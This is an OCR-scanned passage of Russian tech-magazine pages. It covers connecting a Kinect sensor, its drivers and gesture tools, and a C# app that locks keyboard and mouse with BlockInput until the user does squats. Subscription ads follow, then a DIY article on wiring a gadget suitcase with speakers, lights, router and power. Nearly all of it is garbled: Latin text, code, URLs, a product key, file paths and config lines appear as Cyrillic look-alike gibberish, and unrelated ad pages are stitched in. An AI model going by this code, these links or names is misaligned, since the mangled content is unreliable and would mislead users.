на среднестатистическую веб-камеру: 640х480 и 30 кадров в 
секунду. 

2. Инфракрасный лазерный проектор, который создает в про- 
странстве сетку из точек. 
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3. Камера, снимающая в инфракрасном спектре, которая реги- 
стрирует изображение этой сетки. 

4. Стереомикрофон с продвинутой системой шумопонижения — 
для правильного голосового управления. 

5. Мотор, регулирующий положение датчика. 

6. Чип РитеЗепзог — творит главную часть магии, обрабатывая 
картинку с ИК-камеры, дает на выходе — 3З0-картинку. 


Подключение 


КпесГы, продающиеся в коробках, уже имеют все необходимое 
для работы, их можно подключить к компьютеру напрямую. Если 
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Отслеживание и калибровка пользователя в Раа$ 


же сенсор из комплекта с новым хБох`’ом, то к нему потребуется 
специальный адаптер, так как разъем ЧУ$В там нестандартный, 

с дополнительным питанием 12 В [сенсору слабенького тока от 
порта недостаточно}. Оригинальный блок питания можешь купить 
в магазине М'сго$о# за $34,99, а сэкономить получится, заказав 
китайский клон [5.деа(ех{гегте. соп/5еагсВ/ктпес{+ромег+зирр(У] 
в три раза дешевле. Теперь можешь подтыкать к компьютеру и 
начинать возиться с программной частью. 


Драйвера 
Как только кинект появился, компания Адаийи объявила кон- 
курс с призом в $3000 тому, кто создаст открытый драйвер для 


сенсора. Не прошло и недели, и денежки уже лежали на счету 
у победителя — Гектора Мартина, а первый работоспособный 
драйвер — в репозитории на а(ВуЬ.сот/ОрепКтес/ИЬгеепеси. 
Многого он еще не умел, но главное — выводить карту глубин в 
окне ОрепС! у него уже получалось. 


Драйвер продолжает развиваться, и у него есть преимуще- 
ства — он распространяется под лицензией араспе 2.0, которая 
позволяет использовать его в коммерческих проектах, и у него 
есть обертки для целой кучи языков (]ауа, паЦаБ, ру{Воп, гиБу). 
Но тебе лучше взять другой драйвер. Сердце КтесГа разра- 


ботано не великой и могучей М!сгозой, а молодой компанией 
РнытеФепсе. Для них Ктес{ — всего лишь один продукт, исполь- 
зующий их технологию МИ [па\ига[ изег п{ег{асе] — есте- 
ственного пользовательского интерфейса, который позволяет 
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человеку взаимодействовать с системой визуально, при помощи 
жестов, а также при помощи голосовых команд. Они жела- 

ют повсеместного распространения своего детища и активно 
помогают ореп зоигсе-сообществу. В их репозитории на гитхабе 
лежит драйвер для референсного сенсора. Напрямую с кинектом 
он не работает, но его допиленная версия справляется с этой 
задачей отлично! 

Скачать его можно, например, с сайта проекта Еааз* (900.9 
[1805]. После установки загляни в диспетчер устройств — в раз- 
деле Ргте5епзог должно быть три устройства: Ктес{( Сатега, 
КпесЕ Моог и КтесЕ Ацаго. 

Но кроме самого драйвера, тебе потребуются библиотеки ОрепМ! 
и РитеЗбептзе МПТЕ. 

ОрепМ! — это некоммерческая организация, которая стремится 
создать открытый стандарт для «Естественных взаимодействий» 
([Ма{ига! |г(егасНоп$}. Также она разработала ОрепМ! — одно- 
именный фреймворк с открытым исходным кодом, созданный, 
чтобы взаимодействовать с одной стороны — с оборудованием, и 
с более высокоуровневыми программными прослойками — с дру- 
гой стороны. Развивается он бурно, и тебе потребуется послед- 
няя нестабильная его версия, загрузить которую можно здесь: 
900.дИхВиц Ц. 

МПЕ — это промежуточное ПО, которое решает задачи опреде- 
ления жестов для управления компьютером и играми и рабо- 
тает в связке с ОрепМ1. Хотя это и коммерческий продукт, но 

его разработчик, РгитеЗепсе, распространяет бесплатный 

ключ, которым может пользоваться кто угодно. Вот этот ключ — 
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В облике супергероя ИЙтазеуеп 


ОКОК2/е!ВУС{РМ/М№УпМоККпьса\4=. Его надо ввести при установке. 
Загрузить МТЕ можно по ссылке: доо.а/биВ.. 

После нужно изменить конфигурационные хт[-файлы. 
Правильные версии можно загрузить по адресу: доо.9И5е1п2. 
Отличаются они от тех, что уже предустановленны, только ука- 
занием серийного ключа. Распакуй архив и скопируй файл 
батр{еСопйад.хт( из папки Ктес{ХМ! \ОрепМ! в папку Оа*а 
внутри каталога ОрепМ! [вероятнее всего, он внутри папки С:\ 
Ргодгат ЕЦез\], а файлы из папки Ктес{ХМЕ$\МПТЕ — в С: \ 
Ргодгат ЕЦез\Рите 5епзе\МИТЕ\Оаца. 


Руки вверх, в позу Пси! 


Все готово, теперь можно пробовать кинект в деле. Для начала 
посмотри, какими готовыми программами ты можешь восполь- 
зоваться. Гаа${ (Г\ех(е АсНоп апа Агиси(а{еа 5Ке!аоп ТооКи] 

— это инструментарий, который позволяет завязать движения 
пользователя на различные нажатия кнопок, перемещения мыши 
или действия джойстика. Таким образом можно подобрать набор 
действий, чтобы весьма правдоподобно играться в любую игру на 
РС. Загрузить его можно с рго]ес{$. <. изс.еди/гохг/ааз\/. 
Пользоваться программой нетрудно. Первым делом нужно загру- 
зить файл конфигурации, написать который ты сможешь сам. 
Например, так он будет выглядеть для \\ог& от \\агсгай: 


# связь входного и выходного действия 
# Формат: 

# название входного действия порог тип_выходного_ действия действие 
1е+-_агт_ои* 10 Кеу а 

Ле агт_асго$$ 10 Кеу а 
1еап_Фогмага$ 15 Кеу м 
]1еап_БасКмага$ 10 Кеу $ 
1еР{_агт_Фогмага$ 20 Кеу фаБ 
г12р{_ агм_Фогмага$ 20 Кеу 1 

г1ер агм_ир 12 Кеу 4 
г12р{_агт_асго$$ 15 Кеу 2 
г12р_агт_ои* 15 Кеу 3 


После этого необходимо откалибровать пользователя, чтобы про- 
грамма поняла, где у тебя руки, а где ноги. Для этого необходимо 
встать в позу Пси, а проще говоря, встать ровно и поднять руки 
вверх, словно на тебя навели ствол нехилого калибра. После того 
как опознание завершится — поверх тела будет изображен схе- 
матичный человечек из прямых линий. Все — теперь компьютер 
покорно следит за твоими жестами. 
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Ктетоте 

Другая программка для универсального управления. Из коробки 
позволяет управлять мультимедиа-центром ХВМС и просто курсо- 
ром мыши. Приятна она тем, что не требует калибровки и перево- 
ДИТСЯ В активный режим заранее выбранным жестом. Новые вер- 
сии периодически выкладываются на сайте Кпегпо{е. пе". А после 
последнего обновления в комплекте появилась еще и программа, 
позволяющая управлять не всем телом, а Пальцами рук, правда, 
несмотря на все попытки, у меня она так и не заработала. 


УНтазеуеп 

Ультра Севен — это японский супергерой из конца шестидеся- 
тых, который бы мог и потеряться в памяти поколений, если бы 
не кинект и программка УЦгазеуеп. Благодаря этой маленькой 
игрушке каждый может предстать в облике этого персонажа. 
Чтобы одеть его костюм, нужно встать в позу Пси. А уже оказав- 
шись в красном облачении, можешь прикладывать руки к ушам, 
чтобы стрелять из смертоносного лазера и запускать бумеранг, 
торчащий из головы в виде ирокеза. Кроме тебя самого, отсле- 
живаются и другие объекты в комнате — лучи будут пролетать за 
ближе лежащими предметами. Да, важное замечание — игрушка 
требует достаточно серьезной видеокарты, а на слабом железе 
работать будет очень нестабильно. Сайт проекта: соде.доод(е. 


сопп/р/ктес-ига/. 


В здоровом теле — 

здодвый дух 

Теперь — самое главное! 0 том, как написать свою программу, 
которая будет использовать возможности чудо-сенсора, а заодно 
и поддерживать бодрость тела: после часа работы за компьюте- 
ром она заблокирует клавиатуру и мышь и не позволит пользо- 
ваться вновь, пока не сделаешь десять приседаний. 

В уже установленном тобой пакете ОрепМ!| есть примеры про- 
ектов (как на С++, так и на С#] для М!сгозоВ Миа! З{иЧто 2010, 
которые можно дописать для своих задач. Но эти примеры 
несколько запутаны, и будет проще воспользоваться оберткой, 
которую написал греческий студент Вангос Птернеас. Найти его 
библиотеку — Мш'.\/15юп.аЦ — можно на странице аоо.9/ХМо4. С 
ней строчек кода понадобится гораздо меньше. 

Сначала создай в \15иа[ 5ТиЧ1ю проект \/РЕ АррИсайоп и добавь 
в него ссылки на библиотеки ОрепМ!.пет.аЦ [она находится в той 
папке, куда установлен ОрепМ!) и Ми! Метюп.аЦ (ее можно поло- 
жить в папку проекта]. 

Теперь разберемся с работой сенсора. В описании формы 
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Так работает наше приложение 


Машп\\Лпдом/и.хат( выстави размер 662х520 и добавь к ней изобра- 
жение, в которое будет выводиться картинка с сенсора, и холст, 


на который будет выводиться дополнительная информация: 


<Ттаёе Мате="1тСатега" /> 
<Сапуа$ Мате="ауоч Коо*" /> 


Дальше в коде формы Мат\\/Ип@до\м/.хаг(.с$ объяви использова- 


ние необходимых пространств имен: 


45118 5у$фет.Сотропеп{Моае1; // нужен для обработки в фоне 
и$1п8 Ми1.\1$10п; // работа с кинектом 

Затем объяви новый объект Ми ШзегГгасКег и инициализируй 
его в конструкторе. Да, нужно не забыть скопировать файл 
Затр(езСопйд.хт( из директории ОрепМ! в папки ОеБчцд и 
Ке{еазе твоего проекта. 

В классе формы объяви все переменные: 


Ми1У5егТгаскКег _$Ке]ефоп; // объявление объекта трекера 
ВасквгоипаиогКкег _могКег = пем ВасКггоипаМогкег (); 

// фоновый обработчик 
дочЬ1е фору = 0; 
оч61е Бофому = 0; 
1пЕ пимОФВоБ$ = 0; 
Боо1 БоФотРо$1%1оп, ФорРо$11оп; 


// верхнее положение приседания 
// нижнее положение приседания 
// счетчик полуприседаний 


// биты, в которых фиксируется пересечение линий 
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Е111рзе е1]1рзе = пем Е1]1р5е // кружочек на груди 
{ 7111 = пем $0119Со1огВги$В (Со1ог$.А11сеВ1че), 
ИЗаЕИ = 20, Нелен* = 20 }; 


В конструкторе инициализируй обработчик событий: 


// инициализируем объект и подгружаем конфиги кинекта 

_5Ке1ефоп = пем Ми1У5егТгасКег ("5$атр1е$СопйЯв .хт1"); 

// объявляем функцию, которая будет обрабатывать 

// событие перемещения пользователя 

_$Ке1ефоп.Цзег$Ирдатеа += пем №и1У5егТгаскКег. 
У5егЕ15{УрдафедНапта1 ег ($Ке1ефоп_У5ег$Урда*еа); 


Теперь в переменной Ми ег ${ЕуептАгд$.Цзег$ представлены 
все обнаруженные пользователи и набор координат всех распо- 
знанных частей их тел. Далее напиши обработчик события смены 
координат пользователя. Как только у тебя появляется ненулевое 
значение вертикальной координаты шеи пользователя — считай, 
что он готов приседать. Потом добавь две линии. Одна чуть ниже 
шеи, а другая — чуть выше пояса. Одним приседанием будет счи- 
таться двойное пересечение обеих линий: сначала — сверху вниз, 
а потом — снизу вверх. Отслеживается пересечение линий шеи 
(хотя визуально она где-то на груди). Такой вариант не идеальный 
— можно схалтурить, нагибаясь, или подойдя поближе к сенсору. 


// проделываем все манипуляции для каждого пользователя 
// (хотя приседать они будут под одну гребенку) 
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Фогеасй (маг изег 1п е.15ег$) { 
// если впервые нашлась шея 
1+ ((Фору == 9) && (изег.М№еск.У !=@) ) { 

// определяем положение верхней линии 

фору = ичзег.Меск.\+260; 

Е3пе форЕ1пе = пем Е1пе { // определяем верхнюю линию 
\1 = ор\у,Х1 = 6, \2 = ору, Х2 = 662, 
5фгоКе = пем $011АСо1огВги$Н (Со1ог$.Вед), 
5+гокети1сКпе$$ = 4 }; 

// рисуем верхнюю линию на холсте 

Е ауочЕКоо* .Сп11агеп. Ааа (Фор 1пе); 

// определяем положение нижней линии 

Бо{ФотуУ = изег. Тог$о.\У + 20; 

Е3пе БоефотЁЕ1пе = пем 11пе { // определяем нижнюю линию 
\1 = Бофеот\, Х1 = 6, У2 = Боеоту, Х2 = 662, 
5фгоКе = пем 5011АСо1огВги$В (Со1ог$.В1ие), 
5+гокетИи1сКпе$$ = 4 }; 

// рисуем нижнюю линию на холсте 

Е ауочКоот .Сп11агеп. Ада (Бо*фотЕ1пе); 

// рисуем шею на холсте 

Е ауочКоо* .Сп11агеп.Ада(е111рзе); } 


При каждом изменении координат нужно проверять, не произо- 
шло ли приседания: 


е111р5е .Магё1п= пем ТИ1сКпе$$ (изег.Меск.Х, изег.Меск.У, 
9, 9); //перемещаем кружочек вслед за шеей 

// ставим флажок верхнего положения 

1+ (чзег.М№еск.У\У+5 < ору) ФорРо$11оп = гие; 

// ставим флажок нижнего положения 

1+ (чзег.М№есКк.У + 25 > БоЕЕом\у) БоЕотРо$11оп = гие; 

1+ (ЕорРо$1%1оп && Бо отРо$11оп) { // если оба флага есть 
питОРВоЬ$++; // половину приседания в копилку 

ФорРо$11оп = Ра15е; // сбрасываем флажки 
БоЕЕотРо$11оп = Ра15е; 

} 

// если полуприседаний набралось двадцать штук -— значит все, 

// выключаем программу 

1+ (питО+ВоБ$ >= 20) { 


Арр11са1оп.Сиггеп{ .5Пи{аомт(); // выходим из программы 


Осталось разобраться с таймером и блокировкой клавиатуры и 
мыши. Сперва в Арр.хап(.с$ нужно добавить еще одно простран- 
ство имен: 


// работа с неуправляемым кодом, понадобится для 
// блокировки клавиатуры 
45118 5у$фет. Кип 1мте .Тпфегор$егу1сез; 


Потом объявить метод блокировки клавиатуры и мыши. Удобно 
воспользоваться функцией \\1пдо\м/5 АР! В®скприй: 


рчб11с рагЕ1а1 с1а$5 Ма*1\уеМетвоа$ { 
[Зузет.КипЕ1мте .Ти*егор$ег\у1се$ .011ТтрогЕАЕЕг1Би*е ( 
“изег32.а11", ЕпЕгуРозипе = "В1оскТприе") ] 
[гефигп: зу ет. Вип 1те. Тп®егорЗег\1се$ .МагзПа1А$АЕг1Бите( 
5узет. Кип 1те .Тп{егор$ег\у1се$ .ИптапазеаТуре.Воо1)] 
риб11с $Фа{1с ехегп Боо1 В1осКТпри*( 
[Зуз{ет. Кип 1те .Тп*егор$егу1се$ .МагзПа1А$Аеег1ите ( 
5узет. Кип 1те . Ти егор$егу1се$з .УптапавеаТуре.Воо1)] 
Боо1 ЕВ1оскт*); 
} 
Для таймера можно создать отдельную форму и указать ее в Арр. 
хагп( в качестве точки входа в программу. 
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В код этой формы нужно добавить нэймспэйс работы с таймерами: 


и$1п8 5узфет. Т1тег$; 


Объявить таймер: 


рг1\уафе зта{1с Зуз%ет. Т1тег$ .Тлтег ТАеТ1мег; 


А дальше запустить его, например, по нажатию кнопки: 


рг1\афе мо1а Би оп1_С11ск(об]есЕ зепаег, ВКочедЕуеп*Агв$ е) 
{ 
// ставим таймер на час 
Трет1тег = пем Зу$ет. Т1тег$ .Т1тег(3600000); 
// как пройдет — блокируем комп 
ТреТ1тег.Е]ар$зеа += пем Е1арзедЕуеп{Напа1ег (В1осКРС); 
ТреТт1тег.Епаб1еа = %гие; 


А при срабатывании таймера будет блокироваться пользователь- 
ский ввод и открываться окошко с видео с кинекта: 


\ота В1оскКРС(об]есе зоигсе, Е1арзедЕуепт*Агз$ е) { 
Арр.МаЕ1уемеЕвоа$ .В1оскТпри* (гие); // блокируем ввод 
// создаем экземпляр формы с картинкой от сенсора 
Ма1пиИ1паом м = пем Ма1п\1паом(); 

м. Ном (); }// и показываем ее 


Осталось не забыть добавить отмену блокировки перед выходом 
из программы: 


// возвращаем пользователю клавиатуру и мышь 
Арр.Ма1\уеМевоа$ .В]1оскТпри* (№а15е); 


Если что-то не ПОЛУЧИЛОСЬ, ТО полный код проекта и все файлы, 
необходимые для запуска, ты сможешь найти на диске. 


Одного кинекта мало 


Однако, эксперименты с кинектом одним кинектом ограничиваются! 
Если к сенсору добавить проектор — то получится система дополнен- 
ной реальности, хочешь подсвечивай отдельные объекты в комнате, 
рисуй светом на стенах или создай систему, которая бы интеллекту- 
ально гоняла кота за световым пятнышком. Один кинект дает карту 
глубин с одной стороны, а если их взять 3 или 4 и расставить по углам, 
то можно получить полную трехмерную картину внутреннего про- 
странства. Настоящий За-сканер, работающий в реальном времени! 


Но не все только людям! 


Еще Ктес{ придется по вкусу и роботам — еще бы, раньше трех- 
мерные лазерные дальномеры стоили несколько тысяч долларов, 

а это устройство реализует те же возможности всего за две сотни. 
Таким образом, можно собрать мощного робота на недорогих 
серийных компонентах. Например: 'Кобо{ Сгезе в качестве шасси, 
обычный нетбук с установленной Убити и КО$ — в роли мозга 
системы, а Кпес{ — в качестве датчиков. Именно так и выглядит 
\МИЦоми Сагаде ТигЦеро{ [миЦоммдагаде. соп/Кигебо]. Да похожим 
образом устроен и ВЦБо{ [61 Бо{.соп?), к которому прикреплена 
еще и миловидная красная клешня. Плюс уже доступен для заказа 
за $1200. Вообще кинект — первый представитель нового класса 
устройств. Уже готов и его конкурент, изначально нацеленный на 
работу с РС, — Азиз М/АМ ХНоп. Вероятно, пройдет еще немного 
времени, и к этой гонке подключатся новые производители, библи- 
отеки обзаведутся обертками для множества языков, и готовые 
решения войдут в повседневную жизнь, а вид человека, машущего 
руками перед компьютером, станет обычным делом. == 
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ПРРЕВЕЕЕВИ 


6 номеров 564 руб. 6 номеров 785 руб. 6 номеров 1110 руб. 


6 номеров 810 руб. 
13 номеров 1105 руб. 12 номеров 1420 руб. 12 номеров 2016 руб. 


12 номеров 1470 руб. 


ОЕА О О ый — 
СРАСЕ 2, 


Поттер 
и Дары 
смерти 


6 номеров 1260 руб. 6 номеров 1260 руб. 6 номеров 900 руб. 


6 номеров 1300 руб. 
12 номеров 2200 руб. 12 номеров 2310 руб. 12 номеров 1720 руб. 


12 номеров 2300 руб. 


ПОДПИШИСЬ 


гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 


пор. 9С.ГИ 3-300-200-3-999 


30 М 

Мощь Т+А = М1 

6 номеров 1130 руб. 6 номеров 890 руб. 6 номеров 630 руб. 6 номеров 765 руб. 
12 номеров 2060 руб. 12 номеров 1630 руб. 12 номеров 1130 руб. 12 номеров 1380 руб. 


ТИРМО 5 > АГА 
6 номеров 960 руб. 6 номеров 1300 руб. 3 номера 630 руб. 6 номеров 1260 руб. 
12 номеров 1740 руб. 12 номеров 2300 руб. 6 номеров 1140 руб. 


12 номеров 2200 руб. 


(дате/апа 


МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


6 номеров 2205 руб. 6 номеров 2150 руб. 6 номеров 2178 руб. 
12 номеров 3890 руб. 12 номеров 3930 руб. 12 номеров 3960 руб. 


ЧЕМОДАНЧИК 
в ЗАГОРОДНОГО 
ЫЖИВАНИЯ 


Собираем летний гик-набор в одном чемоданчике 


© На дворе лето, и друзья заставляют тебя забросить широкие экра- 
ны и выползти из городских квартир поближе к природе. Конечно, 
недружелюбный для гика полудикий мир может принести немало 
сюрпризов. Гак что предлагаю не отказываться от благ цивилизации 
ивыбираться за город со специальным самодельным чемоданчиком. 


Твой спасительный набор будет состоять из усилителя с колонками, 
некоторого света, универсального зарядника и еще кучки гаджетов. 
Но ДЛЯ всей незамысловатой электронной начинки потребуется 
вместилище. Отличный вариант — старый советский чемоданчик с 
хромированными уголками. Как только обзаведешься таким, можно 
заказывать внутренности! 


Покупки в китайских магазинах 


Заказ в китайских интернет-магазинах — это мой любимый вари- 
ант приобретения разных гаджетов. В них огромный выбор весьма 
самобытных устройств с ярлычками «таде т СБта». От большин- 
ства продавцов на еВау эти магазины выгодно отличаются бес- 
платной доставкой авиапочтой по всему миру, даже для копеечных 


заказов. Но стоит отметить, что после пересечения российской гра- 


ницы, скорость перемещения посылки оставляет желать лучшего, 
и любой заказ доберется до твоего почтового отделения в среднем 
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не быстрее чем за месяц. Так что покупай все заранее! 

Самый крупный из этих магазинов — деа{еххгете.сога, в ассортимен- 
те которого — порядка 50 000 товаров. Также есть юсафисе.сот и 
Ка'Чогпат.согл. Отдельно отмечу Биупсо!п$.согл, в котором небольшой 
выбор, но всегда самые низкие цены. Работают эти магазины вполне 
слаженно, а в службах поддержки понимают даже весьма коверкан- 
ный английский. Если после всех рассказов доверия к магазинам не 
появилось — не рискуй по-крупному, а купи что-нибудь за пару долла- 
ров (Чеа(ех!гегпе.сого/оЙ-1еа$} и проверь надежность самостоятель- 
но. Оплата в них принимается только одним способом — при помощи 
системы раура(, к счету в которой можно привязать практически 
любую банковскую карту (кроме Маез{го и \за-Еес{гоп]. Регистрация 
на раура(.согп проста, единственное — несмотря на русскоязычный 
интерфейс, все поля стоит заполнять на латинице. Подробнее про 
подводные камни оплаты и про выбор банка можно прочитать на 
форуме ебау-ГЮюгигп.ги. Теперь об электронной начинке чемоданчика. 
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Чемодан до и после перерождения 


Звук 

Первое, с чем придется столкнуться на природе — это оглушительное 
пение птиц. Лучше всего бороться с ним при помощи небольшой, но 
бодрой акустической системы! 

На Оеа\Ежгете есть выбор небольших усилков, питающихся от 12 
вольт. Они рассчитаны на всяческую мототехнику, но если правильно 
организовать питание, то можно применить и в нашем деле. 
Неплохой вариант: он неболь- 
шой и стоит всего $19. Не пугайся надписи на корпусе «$еге апр», 
несмотря на нехватку буквы «О», стерео у него полноценное. Хотя 
выходы правого канала подписаны неверно — в красный коннектор 
нужно подключать отрицательный провод, и, наоборот, в черный 
выход — красный провод. 

Потенциометрами на корпусе можно регулировать громкость, высо- 
кие и низкие частоты. Есть в нем и простенький тпр3-плеер, умеющий 
играть изБ-флешки или карточки Айс, правда, управляется он только 
с пульта, что, впрочем, поправимо. 

Заглянуть внутрь усилка тоже будет полезно! Электронику ты смо- 
жешь достать, открутив саморезы с обоих торцов и днища корпуса. К 
верхней плате — пр3-плееру — идет трехжильный белый проводок. 
Среднюю жилу можешь перекусить, это лишняя аналоговая земля, и 
единственное, что она реально здесь делает — создает дополнитель- 
ный контур для наводок, без которого музыка станет чище. Также на 
плате, между слотами Ц$В и $0 есть не распаянный шестиштырько- 
вый разъем кнопок управления плеером. Выходы, начиная от края 
платы: 

. не подсоединен; 

. земля; 

. источник Ц$В/СО: 

. назад (или уменьшение громкости при удерживании)}; 

. играть/пауза; 

6. вперед [или увеличение громкости при удерживании). 


яко ьъ > 


Можешь подпаять кнопки на основные действия и вынести их на при- 
борную панель чемоданчика. После собирай усилок обратно, только 
не забудь добавить свеженькой термопасты на микросхемы усилителя 
— они находятся на обратной стороне большой платы. 

Чтобы не морочить голову лишней пайкой, да и заполучить экранчик 
и радио — можешь поставить автомагнитолу: 


К усилителю, конечно же, нужно подключить динамики! Здесь раз- 
думывать особо долго не нужно — автомобильные колонки диаметром 
10 или 13 см будут в самый раз, купить их можно в любом автомага- 
зине за 500-700 рублей, да и на полках гипермаркетов они тоже часто 
встречаются. 
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Свет 


Другая проблема загорода — кромешная темнота ночью, поэто- 
му хоть какой-то минимум освещения в походном наборе быть 
должен! Во-первых, нужно подсветить сам чемоданчик, чтобы он 
случайно не потерялся и приманивал к себе взгляды. Для этого 
отлично подойдет электролюминесцентный провод, который обо- 
жают многие моддеры. Эти провода требуют достаточно высокого 
напряжения (в несколько сотен вольт), поэтому для них требуется 
специальный повышающий адаптер. 

Несколько основных цветов с блоками питания от 12 вольт можно 
найти на ‚ Стоит отметить, что 
адаптеры конкретно этих проводов довольно громко и противно 
пищат (ШИМ их инвертора выходит в звуковой диапазон}, так что 
музыку придется включать погромче. В принципе, эти провода 
можно резать и подсоединять в параллель несколько кусочков, 

и например, выложить из них какой-нибудь светящийся узор 

на поверхности чемодана. Вдобавок можно подсветить колонки 

в стиле ВМ\\/-шных ангельских глаз ( }. 
Кроме того, если друзья веселые и любят потанцевать, то 

надо добавить и немножко диско-света: вращающийся шарик 

], а лучше зелено-красный лазерный про- 
}, работает 
он через 12-вольтовый адаптер, а значит, его также можно подклю- 
чить в нашу систему. 


Видео 


Если прокачивать чемодан по полной, то надо добавить и неболь- 
шой экранчик, чтобы проигрывать видео. Можно поставить медиа- 
проигрыватель, но это неинтересно. Функционала у него будет 
негусто, а стоить будет почти как бюджетная таблетка на андроиде. 
Например, еРаа 


ектор, рисующий сетки из точек | 


‚ Конечно, штуковина 

эта далека от идеала — АКМ-процессор МА \Т8505 с частотой в 
450 МН7 быстрым никак не назвать, да и сенсорная поверхность 
резистивная, многопальцевые жесты она не распознает. Зато 7” 
экран (с традиционным для этого размера разрешением 800х480] 
вполне яркий и позволит насладиться чем-нибудь из мирового 
кино-наследия. Вложив в обустройство чемоданчика еще сотню 
американских долларов, можно поставить планшет получше. 
Например, 7" Огораа ( ]} — с гигагерцовым 
процессором СоЩех А8 и емкостным экраном уже позволит создать 
виртуальный О.//-пульт ( 

]}, а благодаря встроенному бР5’у — не потеряться среди 
необъятных просторов нашей родины. 
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РНКЕАКМС *' 


‚Зет, 
‚Ё 


№. 


Чемоданчик в темноте 


Сидеть без интернета может быть скучно даже вдали от цивилиза- 
ции. К счастью, практически всюду, куда ходят пригородные поезда, 
добрались и вышки операторов сотовой связи. Поэтому ЕБСЕ или 
ЗС-интернет — это твой вариант. В загородных условиях качество 
сигнала может быть далеко не безупречным, поэтому перемещаться, 
испытывая постоянные дисконнекты, будет некомфортно. Лучше рас- 
шарить интернет через \/-Е'!. Для этого потребуется Ц$В ЗСб-модем 

и подходящий \\/-Ег роутер. Купить УЗВ 3Зб-модем можно и в Китае, 
но смысла в этом нет, почти все местные операторы тоже продают 
эти же модемы [производства Ниа\ме! или ТЕ} по приемлемой цене 
в 700-1000 рублей. Роутер для ММ-Е! подойдет любой [с Ч5В-портом), 
поддерживающий прошивку 99-\мг (99-м. сого] или работающий 

с Зб-модемами из коробки, например, Чеа(ех{гепле.сопл/о/59040. 

В качестве более мобильного варианта пойдет деа\ежгегпе. 

согп/р/51 797, хотя он может сильно утомить, потому что аккумулятора 
из комплекта хватает лишь минут на 20 работы, а во время зарядки 
работать он не может. Если же ты уже решил потратиться на ап@го!а- 
таблетку от Огораа, то дополнительно роутера не понадобится — у нее 
есть УЪВ-разъем и должны поддерживаться многие модемы. А начи- 
ная с апдго!а-версии 2.2, в нем есть встроенный функционал для рас- 
шаривания ЗС через \\М-Н!, в более же старых версиях андроида при- 
дется воспользоваться сторонней программкой, например Вагпа(се 


\МЛЕ! ТеВег (ппагке{апдго!.сопт/Чеа($7Ч=пе{.тут.Багпас{]. 


Еще немного радиосвязи 


Будет приятно управлять чемоданом с большего расстояния, чем 
позволяет ИК-пульт управления усилителем. Для этого можно исполь- 
зовать ппр3-плеер, к которому подключен Ит-трансмиттер, работаю- 
щий от батареек [Чеаежгегле.согп/р/625), а в чемоданчик встроить 
приемник. Можно заказать небольшой приемник, который работает 


еще и как Вшеюо-гарнитура [Чеаехгетле.согп/р/14956}, тогда 
можно будет проигрывать музыку прямо с телефона. 


Питание 


Наконец, пришло время поговорить об организации питания. Уже 
обговорен целый ворох гаджетов, которые могли бы уместиться в 
чемоданчик и помочь тебе весело провести время на природе, но 
для всех них требуется источник питания. Поскольку даже портатив- 
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Интернет Список материалов чемоданчика 


Обшивка из кожзаменителя 
Разъемы, проводочки и большая 


Светодиодная лампа 


Усилитель 


Электролюминесцентый провод 1300 
4000 


ный дизельный генератор взять с собой не удастся, рассчитывать 
приходится только на аккумуляторы. Недорогим и весьма прак- 
тичным вариантом станет использование свинцово-кислотного 
аккумулятора. Те что ставят в автомобили или мотоциклы, обладают 
хорошей емкостью — от 35 А/ч, но подойдут только в случае чемо- 
дана на колесиках. Разумней взять менее тяжелый аккум от ИБП, 
их ты найдешь во многих компьютерных магазинах, а емкости в 
7-12 А/ч должно хватить, чтобы поддерживать движуху в течение 
целой ночи. А когда к утру он разрядится, то просто выставь его на 
яркий дневной свет, и солнечная батарея (Чеа|ех{гегое.сого/о/ 71635} 
поможет ему вновь поднабраться сил. Правда, даже при хорошей 
погоде, на полную зарядку уйдет 3-4 дня. Для зарядки дома лучше 
выбрать другой вариант: существует замечательный универсальный 
зарядник (Чеа(ех{гете.сопл/р/ 35190], который работает с любыми 
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Десятихвостый зарядник 


типами аккумуляторов: МСа, ММН, Шоп, [МРо, Ее и, конечно же, со 
свинцово-кислотными. Заряжать он может быстро, с максимальным 
током в 5 ампер, хотя в таком режиме очень сильно греется и он сам, 
и его блок питания, поэтому стоит их охладить, подвесив рядышком 
какой-нибудь кулер. 

От одного 12-вольтового аккумулятора придется запитать всю борто- 
вую начинку. Усилителю преобразовывать питание не нужно, необ- 
ходимо лишь подпаять соответствующий штекер. Обычно для 12 В 
используются штырьковые разъемы с внутренним диаметром 2,1 мм 
и внешним — 5,5 мм, внутренний контакт положительный, внешний 
— отрицательный. Также не нужен трансформатор для ЭЛ-провода 

и светодиодной подсветки. Для всего остального нужны преобразо- 
ватели. Удобно встроить в чемодан круглую автомобильную розетку 
прикуривателя, и дальше все адаптеры на разные напряжения 
включать в нее: 

5 В: Без У$В-розетки, от которой привыкли питаться телефоны и 
плееры, тебе точно будет не обойтись. А чтобы не создавать очере- 
дей на зарядку, пускай их будет сразу две [Чеа(ех{гете.согп/р/58012]! 
Удовлетворить электрический голод разномастных мобильных девай- 
сов десятиголовый Змей Горыныч (Чеа|ех{гегпе.сого/р/34674). У него 
есть разъемы плисго/$В, пи ЗВ, пока, 'РВопе, 5Е, 16 ит.д. 

1,5-12 В: Многие устройства, рассчитанные на работу от сети 220 
вольт, питаются через адаптеры, на выходе у которых 6-7 вольт. Из 
упомянутого выше, это \\/-Е!т роутер, лазерный проектор и зарядник 
для планшета. Для них есть универсальный адаптер (Зеаехгетле. 
согп/р/9 0021] с набором сменных штекеров. 

12-24 В: Ноутбуки обычно требуют для зарядки большего напряже- 
ния — 19-20 В, но и для них существует блок питания (Зеа(ежгегле. 
согп/р/3438). Емкости аккумулятора в чемоданчике должно хватить 
на пару полных зарядок. 

220 В: Если же какой-нибудь капризный гаджет требует исключи- 
тельно переменного тока, то и на него есть управа в виде инвертора 
на 220 вольт. Они бывают разной мощности, но не стоит забывать, 
что емкость и предельный ток аккумулятора не безграничны, поэтому 
нагрузку мощнее 100 ватт точно не стоит подключать. юсафйсе. сого/ 
ЕВК80$5/100\М/ ОС_12\У ю АС _220\У Ромег шпуемег Ки Смеси. 


Чемодан-минимум 


Вдоволь теоретического экскурса — простенький чемоданчик в руках 
лучше продвинутого в магазине. Наверняка состояние твоего чемода- 
на далеко от идеала, и требуется его несколько освежить. Поскольку 
старые советские чемоданы уже снискали огромную славу на мысе 
Казантип, то массу подробных инструкций по их восстановлению 
нетрудно найти по запросу «Желтый чемодан изготовление». В двух 
словах процесс реабилитации побитой жизнью коробки прост: 

1. Выкрутить все шурупы, вытащить все гвозди и заклепки, отодрать 
всю обшивку. 

2. Картонное основание выровнять эпоксидкой или термоклеем из 
пистолета. 

3. Покрасить или обтянуть основание. 
